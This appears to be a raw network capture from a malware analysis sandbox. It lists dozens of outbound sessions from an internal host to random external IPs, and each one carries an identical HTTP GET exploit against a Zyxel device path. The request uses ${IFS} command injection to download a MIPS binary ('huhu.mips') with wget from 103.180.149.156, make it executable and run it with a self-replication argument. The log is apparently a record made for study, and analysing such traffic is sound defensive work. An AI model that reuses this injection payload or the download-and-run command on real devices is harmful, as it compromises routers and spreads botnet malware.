                                            Feb 2, 2024 06:21:09.566375017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3489192.168.2.1546034194.200.133.13443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.566390991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3490192.168.2.154333470.225.253.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.566416025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3491192.168.2.154585844.121.29.88443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.566464901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3492192.168.2.156077436.215.205.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.566504002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3493192.168.2.1553674167.8.145.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.566560984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3494192.168.2.1557882156.223.145.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.566606045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3495192.168.2.153557058.199.166.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.566653013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3496192.168.2.154524486.153.199.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.566690922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3497192.168.2.1551972206.3.29.163443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.566713095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3498192.168.2.1558986121.213.85.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.566766977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3499192.168.2.1542412192.178.166.25443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.566807032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3500192.168.2.1549450106.11.38.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.566854000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3501192.168.2.1553774168.210.141.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.566880941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3502192.168.2.154348234.66.254.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.566891909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3503192.168.2.1544076174.14.145.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.566926003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3504192.168.2.1540576149.228.111.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.566987991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3505192.168.2.1546096195.58.238.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.567034006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3506192.168.2.153969679.151.141.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.567065954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3507192.168.2.1536060155.50.127.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.567130089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3508192.168.2.1550688223.90.96.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.567151070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3509192.168.2.1550416123.117.131.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.567187071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3510192.168.2.153807846.8.183.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.567231894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3511192.168.2.1555040219.187.53.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.567293882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3512192.168.2.1559322192.251.7.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.567321062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3513192.168.2.155365644.195.108.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.567379951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3514192.168.2.1543502216.18.199.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.567405939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3515192.168.2.1554844201.156.52.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.567451954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3516192.168.2.1546890191.190.78.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.567516088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3517192.168.2.154764274.211.174.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.567519903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3518192.168.2.155875864.29.235.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.567560911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3519192.168.2.1549886157.4.207.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.567605972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3520192.168.2.1557328105.41.52.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.567636013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3521192.168.2.155640679.213.118.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.567676067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3522192.168.2.1556394162.184.25.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.567706108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3523192.168.2.1551528172.167.187.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.567749977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3524192.168.2.153861087.56.243.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.567774057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3525192.168.2.154643680.232.42.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.567836046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3526192.168.2.1551386159.68.86.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.567861080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3527192.168.2.1540590129.2.48.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.567898035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3528192.168.2.1547356122.74.54.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.567960024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3529192.168.2.1542786176.67.110.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.567991018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3530192.168.2.1550476163.46.36.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.568052053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3531192.168.2.1557818188.18.248.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.568084002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3532192.168.2.1533544152.80.159.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.568133116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3533192.168.2.153798057.122.186.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.568151951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3534192.168.2.1551042104.216.116.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.568202972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3535192.168.2.1538766139.152.150.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.568248987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3536192.168.2.1533474173.217.71.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.568284988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3537192.168.2.155302683.162.236.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.568301916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3538192.168.2.1536024213.232.12.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.568351030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3539192.168.2.1542238196.182.131.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.568380117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3540192.168.2.154817225.82.236.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.568406105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3541192.168.2.155370277.61.22.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.568444014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3542192.168.2.1535316182.225.31.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.568479061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3543192.168.2.1556902213.200.179.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.568541050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3544192.168.2.154567877.122.65.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.568582058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3545192.168.2.1549360219.252.241.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.568603992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3546192.168.2.156044443.235.44.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.568629026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3547192.168.2.155691863.4.179.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.568684101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3548192.168.2.1550976101.22.11.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.568732023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3549192.168.2.1546238189.21.119.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.568780899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3550192.168.2.1540984106.62.19.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.568814993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3551192.168.2.1551830154.252.99.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.568836927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3552192.168.2.1538054128.184.232.3443
                                            TimestampBytes transferredDirectionData
